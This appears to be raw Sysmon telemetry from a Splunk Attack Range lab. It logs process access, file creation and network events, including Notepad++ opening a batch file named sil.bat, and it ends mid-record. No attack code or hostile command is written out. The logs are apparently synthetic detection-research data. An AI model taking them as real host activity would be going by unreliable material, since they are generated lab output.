Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.861{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.388{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.388{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.388{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.388{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.388{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5D4-60EB-737D-00000000CF01}7616C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.373{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F5D4-60EB-737D-00000000CF01}7616C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001050876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.322{466BC892-F5D4-60EB-737D-00000000CF01}7616C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\test\sil.bat"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001050875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.341{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94AFECF8D4C6C020F7B5FEF62236F3EF,SHA256=C39A9C7BCD72144160E9A1CAB328ED537F23F86487B050B8EF5965BB7C8563F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:09.840{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D536F246EBA3293D46BCD74A1210CC,SHA256=E73234A98E7B12A5374C0E2EBF3AC2564434E2BBE9C60257622F4F8E1182AFB5,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001050888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.723{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\AlternateServices.txt2021-07-09 11:26:57.697 23542300x80000000000000001050887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.723{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\AlternateServices.txtMD5=CD89B5DA97B6A86A69236FC9D0852E18,SHA256=BDBA6009B73873EC2E4FCE5D54A0C2BA57FE945AC3DF50684B52FE584BEE82E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB105E9A3C121ACEF828696CCE8D0DDD,SHA256=A6050E8DF9C408A693F2E1FABD129A42F15B26C85629C78845C972F97684F943,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.344{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55C15B626C6003D1E37E4A208E66C500,SHA256=21D151C2E0B9AA6C44B878C4B73D73838B481E48EC1A4BA19BDB560A6A0F630C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:08.207{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57328-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:10.871{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=480AC5E6D1E75451C3E90BF3465FEBFF,SHA256=2D962F36DEDC849445E520125758D06571647F427DE40D5E2534D7D955311708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:10.359{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B54345F2B71F10D44CC4479E19F9F4,SHA256=260F46A93C2BF571A5A820C73A9727264AAF567BFE9BA64250AAF7B0BFC0E97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:11.871{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B30AFFCB2F41BCF188F7091356DE416,SHA256=5896DCF73C41AAF2ABBC68ACD3AD482E7C9F2563535BF73B82C46DED27457596,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51095-false10.0.1.12-8000- 23542300x80000000000000001050890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:11.363{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0631F57859867587E53A6C76FFB35A10,SHA256=282EC749E3E0F9665B2FF07F7F5BBF93881DE4240FC6543A0EFE264FD01DBCE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:12.887{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6727E14F803C37D111265F34121BCDC,SHA256=46033431E426C62E4F2C6A2C799597F1C809F94FC4D41DA50F38270E2CE8A822,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:12.388{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3574862F9B25CB39D3610EA77DE5AE56,SHA256=2B96075C71A65F2BF523902E218F1951D3B75B93BC953B3B3C8EFD8D567BA163,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:13.918{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22FB257A1442C4A6CA6F32CD12E3F483,SHA256=91A66DF861BED58A3A06C731C5CA1A27E1D4521014DF7BCB05DDA8E5699CDF34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:13.388{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=603F576DC476FDEE0FADC6388A5ABCB6,SHA256=1FE69FA245DC4530D27E2D0351E5AF12F1C1DDC3C6043B5DA013B9E03F7F53B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:14.962{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F65FAF129A4A336CFC0509C475E8B5E,SHA256=27893C08855CF23383A94DADA1C73D74913F6357982869B0B3C36BDA3DC1CBED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:14.405{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FDCB95169C60C66F2CDEC493C172DEF,SHA256=45D7D042A19F4792A5DDCE303E1163867146EE4CBFC5FA47E65F378B2886704C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:13.394{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57329-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:07.980{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51096-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001050900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:07.980{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51096-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001050899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.445{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84B18A97F384235E1450CEEBC885957E,SHA256=D6DC5B17FF0E5F0B5FFC8088580BA4B469906438CE7A49F1C4B23FCF4DEF2A6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.445{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB1E122BE79E3094640C7ED977F77184,SHA256=D6161615B8D945E8CBB5A5A55A98C46047F566DC1AB9CDB911A4A8DAE225C2E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.430{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78FF1CBB3174915EF0319E188ED44AD8,SHA256=7AFC20BA162BF3230AF3796D89598B8ED32AB8D190BBBF779452F4229B27B16C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001050896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.191{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sil.bat2021-07-12 07:44:38.363 23542300x80000000000000001050895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.191{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sil.batMD5=F37A2EB46591A451D21627197B116801,SHA256=D6587494387D482BC0F9E9B633306F4622B98F0320497C053E6870CEC8047190,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:16.449{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A6A9800215283FF868E18BEA5861E18,SHA256=15C2A7B8E0B49151C35EDD9A0CDDCCDA9F8D8055B16D80B1BD76203E7EBCAF7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:16.009{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED194E7DC7544B5FDABB8EF47F864B2C,SHA256=638C19B83AD226C8BE9BAC6E702F07E788372E8C3D62967FF20BF15EFCDB1481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84B18A97F384235E1450CEEBC885957E,SHA256=D6DC5B17FF0E5F0B5FFC8088580BA4B469906438CE7A49F1C4B23FCF4DEF2A6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.702{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51097-false10.0.1.12-8000- 23542300x80000000000000001050955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.449{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9436C8F53A110319E0098ABB29BE8FC,SHA256=000E3C224671EFDC64D3011137606F8D52CF8E9E4BB9E854A8E9EE92DFD2DF47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:17.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B87D60A40CEF5E1793724D16AD77C08,SHA256=76A4F966C7CEFA695B3EF962F8BD6353207DAFD471312812A83B2DDD38C58EC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18AA8BAA394FEE0AE0E0E908F3798DDC,SHA256=C191CF2C641709EF8C6ABD5752956472F4DC8641F683FBC8CC77CE4D2B79C17F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DD-60EB-787D-00000000CF01}9404C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 